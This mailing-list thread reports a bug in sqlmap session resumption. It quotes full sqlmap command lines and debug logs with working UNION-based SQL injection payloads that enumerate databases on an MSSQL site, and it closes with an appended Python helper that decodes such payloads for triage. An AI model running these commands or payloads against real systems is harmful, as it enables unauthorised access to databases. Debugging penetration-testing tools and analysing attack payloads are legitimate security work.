Re: [sqlmap-users] Bug(?) with resuming/not resuming sessions with MSSQL (possible anothers dbms)
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-22 15:38:12
Fixed and committed. Thanks for reporting, David.

Bernardo

On Fri, Mar 19, 2010 at 02:22, David Guimaraes <sk...@gm...> wrote:
> When I try to run sqlmap this way:
>
> # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" -p art --string WRAPED
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:53:24
>
> [22:53:24] [DEBUG] initializing the configuration
> [22:53:24] [DEBUG] initializing the knowledge base
> [22:53:24] [DEBUG] cleaning up configuration parameters
> [22:53:24] [DEBUG] setting the HTTP timeout
> [22:53:24] [DEBUG] setting the HTTP method to GET
> [22:53:24] [DEBUG] creating HTTP requests opener object
> [22:53:24] [DEBUG] parsing XML queries file
> [22:53:24] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
> [22:53:24] [INFO] testing connection to the target url
> [22:53:25] [INFO] testing if the provided string is within the target URL page content
> [22:53:29] [WARNING] the testable parameter 'art' you provided is not into the Cookie
> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis
> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art'
> [22:53:29] [DEBUG] got HTTP error code: 500
> [22:53:30] [DEBUG] got HTTP error code: 500
> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art'
> [22:53:30] [DEBUG] got HTTP error code: 500
> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis
> [22:53:30] [INFO] testing for parenthesis on injectable parameter
> [22:53:31] [DEBUG] got HTTP error code: 500
> [22:53:31] [DEBUG] got HTTP error code: 500
> [22:53:32] [DEBUG] got HTTP error code: 500
> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis
> [22:53:32] [INFO] testing MySQL
> [22:53:32] [DEBUG] got HTTP error code: 500
> [22:53:32] [WARNING] the back-end DMBS is not MySQL
> [22:53:32] [INFO] testing Oracle
> [22:53:33] [DEBUG] got HTTP error code: 500
> [22:53:33] [WARNING] the back-end DMBS is not Oracle
> [22:53:33] [INFO] testing PostgreSQL
> [22:53:33] [DEBUG] got HTTP error code: 500
> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL
> [22:53:33] [INFO] testing Microsoft SQL Server
> [22:53:34] [DEBUG] got HTTP error code: 500
> [22:53:34] [INFO] confirming Microsoft SQL Server
> [22:53:35] [DEBUG] got HTTP error code: 500
> [22:53:35] [DEBUG] got HTTP error code: 500
> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique
> [22:53:39] [DEBUG] got HTTP error code: 500
> [22:53:39] [DEBUG] got HTTP error code: 500
> [22:53:40] [DEBUG] got HTTP error code: 500
> [22:53:40] [DEBUG] got HTTP error code: 500
> [22:53:44] [DEBUG] got HTTP error code: 500
> [22:53:44] [DEBUG] got HTTP error code: 500
> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art'
> [22:53:45] [DEBUG] got HTTP error code: 500
> [22:53:45] [DEBUG] got HTTP error code: 500
> [22:53:46] [DEBUG] got HTTP error code: 500
> [22:53:46] [DEBUG] got HTTP error code: 500
> [22:53:47] [DEBUG] got HTTP error code: 500
> [22:53:47] [DEBUG] got HTTP error code: 500
> [22:53:47] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
> [22:53:47] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value
> [22:53:48] [DEBUG] got HTTP error code: 500
> [22:53:49] [DEBUG] got HTTP error code: 500
> [22:53:49] [DEBUG] got HTTP error code: 500
> [22:53:49] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability
> valid union: 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410'
>
> [22:53:49] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 22:53:49
>
> It correctly notes the UNIONSQLi and ends OK. Soon after that, I try to recover the database by including only the argument "--dbs", and it cannot recover it with the UNIONSQLi, for the strange reason described below, and goes to the BLINDSQLi. It tries to find the right table name without first knowing how many there really are through the use of the UNIONSQLi, and directly tries to find out how many there are and their names using the BLINDSQLi.
>
> Example with resume:
>
> # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:54:40
>
> [22:54:40] [DEBUG] initializing the configuration
> [22:54:40] [DEBUG] initializing the knowledge base
> [22:54:40] [DEBUG] cleaning up configuration parameters
> [22:54:40] [DEBUG] setting the HTTP timeout
> [22:54:40] [DEBUG] setting the HTTP method to GET
> [22:54:40] [DEBUG] creating HTTP requests opener object
> [22:54:40] [DEBUG] parsing XML queries file
> [22:54:40] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
> [22:54:40] [INFO] resuming string match 'WRAPED' from session file
> [22:54:40] [INFO] resuming injection point 'GET' from session file
> [22:54:40] [INFO] resuming injection parameter 'art' from session file
> [22:54:40] [INFO] resuming injection type 'numeric' from session file
> [22:54:40] [INFO] resuming 0 number of parenthesis from session file
> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
> [22:54:40] [INFO] resuming union comment '--' from session file
> [22:54:40] [INFO] resuming union count 6 from session file
> [22:54:40] [INFO] resuming union position 2 from session file
> [22:54:40] [INFO] testing connection to the target url
> [22:54:43] [WARNING] the testable parameter 'art' you provided is not into the Cookie
> [22:54:43] [INFO] testing for parenthesis on injectable parameter
> [22:54:43] [DEBUG] skipping test for MySQL
> [22:54:43] [DEBUG] skipping test for Oracle
> [22:54:43] [DEBUG] skipping test for PostgreSQL
> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [22:54:43] [INFO] fetching database names
> [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796
> [22:54:44] [DEBUG] got HTTP error code: 500
> [22:54:45] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind
> [22:54:45] [INFO] fetching number of databases
> [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
> [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500
> [22:54:48] [DEBUG] got HTTP error code: 500
> .
> .
> .
> [23:12:13] [DEBUG] performed 42 queries in 16 seconds
> available databases [3]:
> [*] mXX
> [*] pXX
> [*] tXX
>
> [23:12:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 23:12:13
>
> But if I delete the session and start sqlmap over with "--dbs" activated, it correctly retrieves how many databases there are and their names using the correct technique (UNIONSQLi).
>
> Example without resume (using --dbs the first time):
> # rm -rf output/*
> # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 23:16:02
>
> [23:16:02] [DEBUG] initializing the configuration
> [23:16:02] [DEBUG] initializing the knowledge base
> [23:16:02] [DEBUG] cleaning up configuration parameters
> [23:16:02] [DEBUG] setting the HTTP timeout
> [23:16:02] [DEBUG] setting the HTTP method to GET
> [23:16:02] [DEBUG] creating HTTP requests opener object
> [23:16:02] [DEBUG] parsing XML queries file
> [23:16:02] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
> [23:16:02] [INFO] testing connection to the target url
> [23:16:02] [INFO] testing if the provided string is within the target URL page content
> [23:16:03] [WARNING] the testable parameter 'art' you provided is not into the Cookie
> [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis
> [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art'
> [23:16:04] [DEBUG] got HTTP error code: 500
> [23:16:04] [DEBUG] got HTTP error code: 500
> [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art'
> [23:16:05] [DEBUG] got HTTP error code: 500
> [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis
> [23:16:05] [INFO] testing for parenthesis on injectable parameter
> [23:16:05] [DEBUG] got HTTP error code: 500
> [23:16:05] [DEBUG] got HTTP error code: 500
> [23:16:06] [DEBUG] got HTTP error code: 500
> [23:16:06] [INFO] the injectable parameter requires 0 parenthesis
> [23:16:06] [INFO] testing MySQL
> [23:16:06] [DEBUG] got HTTP error code: 500
> [23:16:06] [WARNING] the back-end DMBS is not MySQL
> [23:16:06] [INFO] testing Oracle
> [23:16:07] [DEBUG] got HTTP error code: 500
> [23:16:07] [WARNING] the back-end DMBS is not Oracle
> [23:16:07] [INFO] testing PostgreSQL
> [23:16:07] [DEBUG] got HTTP error code: 500
> [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL
> [23:16:07] [INFO] testing Microsoft SQL Server
> [23:16:08] [DEBUG] got HTTP error code: 500
> [23:16:08] [INFO] confirming Microsoft SQL Server
> [23:16:14] [DEBUG] got HTTP error code: 500
> [23:16:15] [DEBUG] got HTTP error code: 500
> [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [23:16:15] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique
> [23:16:15] [DEBUG] got HTTP error code: 500
> [23:16:15] [DEBUG] got HTTP error code: 500
> [23:16:16] [DEBUG] got HTTP error code: 500
> [23:16:16] [DEBUG] got HTTP error code: 500
> [23:16:16] [DEBUG] got HTTP error code: 500
> [23:16:17] [DEBUG] got HTTP error code: 500
> [23:16:17] [INFO] confirming full inband sql injection on parameter 'art'
> [23:16:17] [DEBUG] got HTTP error code: 500
> [23:16:18] [DEBUG] got HTTP error code: 500
> [23:16:18] [DEBUG] got HTTP error code: 500
> [23:16:19] [DEBUG] got HTTP error code: 500
> [23:16:19] [DEBUG] got HTTP error code: 500
> [23:16:20] [DEBUG] got HTTP error code: 500
> [23:16:20] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
> [23:16:20] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value
> [23:16:21] [DEBUG] got HTTP error code: 500
> [23:16:22] [DEBUG] got HTTP error code: 500
> [23:16:27] [DEBUG] got HTTP error code: 500
> [23:16:27] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability
> valid union: 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716'
>
> [23:16:27] [INFO] fetching database names
> [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578
> [23:16:28] [DEBUG] got HTTP error code: 500
> [23:16:28] [DEBUG] performed 1 queries in 0 seconds
> [23:16:28] [INFO] the SQL query provided returns 3 entries
> [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases)-- AND 7328=7328
> [23:16:31] [DEBUG] got HTTP error code: 500
> [23:16:31] [DEBUG] performed 2 queries in 3 seconds
> [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases)-- AND 1346=1346
> [23:16:32] [DEBUG] got HTTP error code: 500
> [23:16:32] [DEBUG] performed 3 queries in 0 seconds
> [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases)-- AND 231=231
> [23:16:33] [DEBUG] got HTTP error code: 500
> [23:16:33] [DEBUG] performed 4 queries in 1 seconds
> available databases [3]:
> [*] mXX
> [*] pXX
> [*] tXX
>
> [23:16:33] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 23:16:33
>
> The same thing happens if I send sqlmap to dump the tables (--tables). If I do not pass --tables the first time it runs and discovers the vulnerability, when it runs again with the resumed file, it just goes right for BLINDSQLi, taking much longer to complete the task!
>
> --
> David Gomes Guimarães

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
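Added example, not code from this thread or from sqlmap itself: a small Python triage helper for the union payloads quoted in the logs above. It decodes the CHAR()-built delimiters that sqlmap wraps a query result in, counts the union's columns with nesting awareness (the ISNULL(CAST(...), CHAR(32)) column contains commas of its own), and shows how a value is read back from a page between those delimiters, which is the step the resumed run above was failing before it went blind. The request paths and the response fragment are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed request paths modelled on the payloads quoted in the thread (not from a real log).
SAMPLE_PATHS = [
    "/professor.asp?prof=247&menu=professores&art=5021",
    "/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL"
    "%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716",
    "/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL"
    "%2C%20CHAR(84)%2BCHAR(116)%2BCHAR(77)%2BCHAR(114)%2BCHAR(107)%2BCHAR(90)%2BISNULL(CAST("
    "COUNT(name)%20AS%20VARCHAR(8000))%2C%20CHAR(32))%2BCHAR(72)%2BCHAR(73)%2BCHAR(66)%2BCHAR(90)"
    "%2BCHAR(76)%2BCHAR(101)%2C%20NULL%2C%20NULL%2C%20NULL%20FROM%20master..sysdatabases--%20AND%202578=2578",
]

UNION_RE = re.compile(r"\bUNION\s+ALL\s+SELECT\s+(.*?)(?:\s+FROM\s+([\w.]+))?\s*--", re.I | re.S)
CHAR_RUN_RE = re.compile(r"\b(?:CHAR\(\d+\)\+)+CHAR\(\d+\)")  # CHAR(84)+CHAR(116)+... runs

def decode_char_run(run):
    """CHAR(84)+CHAR(116)+CHAR(77) -> 'TtM': the random delimiters sqlmap wraps output in."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", run))

def count_columns(select_list):
    """Count top-level columns; commas nested in ISNULL(CAST(...), CHAR(32)) must not count."""
    depth, cols = 0, 1
    for ch in select_list:
        depth += (ch == "(") - (ch == ")")
        cols += ch == "," and depth == 0   # only a depth-0 comma separates columns
    return cols

def analyse_path(path):
    """Return a finding for the first parameter carrying a UNION ALL SELECT payload, else None."""
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        m = UNION_RE.search(value)
        if not m:
            continue
        markers = [decode_char_run(r) for r in CHAR_RUN_RE.findall(m.group(1))]
        return {
            "param": name,
            "columns": count_columns(m.group(1)),
            "markers": markers,            # [] for the NULL column-count probe
            "source": m.group(2),          # e.g. master..sysdatabases, None for the probe
            "stage": "data extraction" if markers else "column-count probe",
        }
    return None

def extract_inband_value(body, prefix, suffix):
    """Read back what the union placed between the delimiters (how sqlmap parses the page)."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    return m.group(1) if m else None
```

On the third sample path the finding reports six columns, the delimiters TtMrkZ and HIBZLe and master..sysdatabases as the source; a page fragment such as TtMrkZ3HIBZLe then yields the "3" that the fresh run above logged as "the SQL query provided returns 3 entries".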